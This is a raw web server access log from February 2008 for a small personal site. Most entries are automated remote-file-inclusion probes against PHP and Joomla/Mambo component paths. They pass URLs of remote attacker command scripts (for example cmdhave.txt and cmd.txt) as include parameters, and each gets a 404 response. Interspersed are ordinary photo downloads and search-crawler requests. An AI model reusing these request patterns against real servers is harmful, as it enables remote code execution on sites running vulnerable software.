80.237.208.43 - - [21/Feb/2008:05:15:54 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:16:41 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:16:42 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:17:40 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.215.229.125 - - [21/Feb/2008:05:18:52 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:20:06 -0800] "GET /order/login.php?svr_rootscript=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:20:06 -0800] "GET /logs/order/login.php?svr_rootscript=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.20.57 - - [21/Feb/2008:05:22:00 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.australiada.net/userpics/zwierzeta_motyle/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.225.91 - - [21/Feb/2008:05:24:53 -0800] "GET /logs/active/components/xmlrpc/client.php?c[components]=http://www.schullie.com/WebCalendar-1.0.4/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.193.225.91 - - [21/Feb/2008:05:24:53 -0800] "GET /active/components/xmlrpc/client.php?c[components]=http://www.schullie.com/WebCalendar-1.0.4/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:25:26 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:25:26 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:05:25:54 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:05:25:54 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:05:26:07 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:05:26:08 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:05:26:08 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:05:27:45 -0800] "GET /logs/index.php?sourcedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.154.38.121 - - [21/Feb/2008:05:27:46 -0800] "GET /index.php?sourcedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:28:03 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:28:06 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:05:28:35 -0800] "GET /logs/access_070902.log HTTP/1.0" 200 22717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.49.42 - - [21/Feb/2008:05:29:18 -0800] "GET //login.php?dir=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
70.84.49.42 - - [21/Feb/2008:05:29:18 -0800] "GET /logs//login.php?dir=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:29:27 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:29:28 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.221 - - [21/Feb/2008:05:30:15 -0800] "GET /index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/gallery/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:05:30:34 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:05:30:34 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:05:30:37 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:05:30:38 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:05:30:39 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:43 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:43 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:44 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:44 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
84.179.162.51 - - [21/Feb/2008:05:30:46 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:46 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:46 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:53 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:53 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:59 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:30:59 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:30:59 -0800] "GET /logs/access_080108.log/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:30:59 -0800] "GET /services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:30:59 -0800] "GET /logs/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:00 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:00 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:01 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:03 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:03 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:04 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:05 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:06 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:08 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:31:08 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:08 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:09 -0800] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.24 - - [21/Feb/2008:05:31:10 -0800] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:05:31:41 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:05:33:33 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:05:34:10 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:34:31 -0800] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:34:32 -0800] "GET /convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:34:32 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.105 - - [21/Feb/2008:05:35:50 -0800] "GET /tmp/?N=D HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:05:35:59 -0800] "GET /images/evil.php?owned=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:05:35:59 -0800] "GET /logs/images/evil.php?owned=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:05:36:00 -0800] "GET /images/evil.php?owned=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:05:36:00 -0800] "GET /logs/images/evil.php?owned=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:05:36:05 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:05:36:06 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:05:37:48 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:05:38:01 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:39:06 -0800] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:39:06 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:39:07 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:39:36 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:39:37 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:39:52 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.51.176 - - [21/Feb/2008:05:40:00 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.194.250.200 - - [21/Feb/2008:05:42:46 -0800] "GET /logs/access_071212.log HTTP/1.1" 200 89527 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
61.72.254.250 - - [21/Feb/2008:05:43:37 -0800] "GET //skin/zero_vote/error.php?dir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
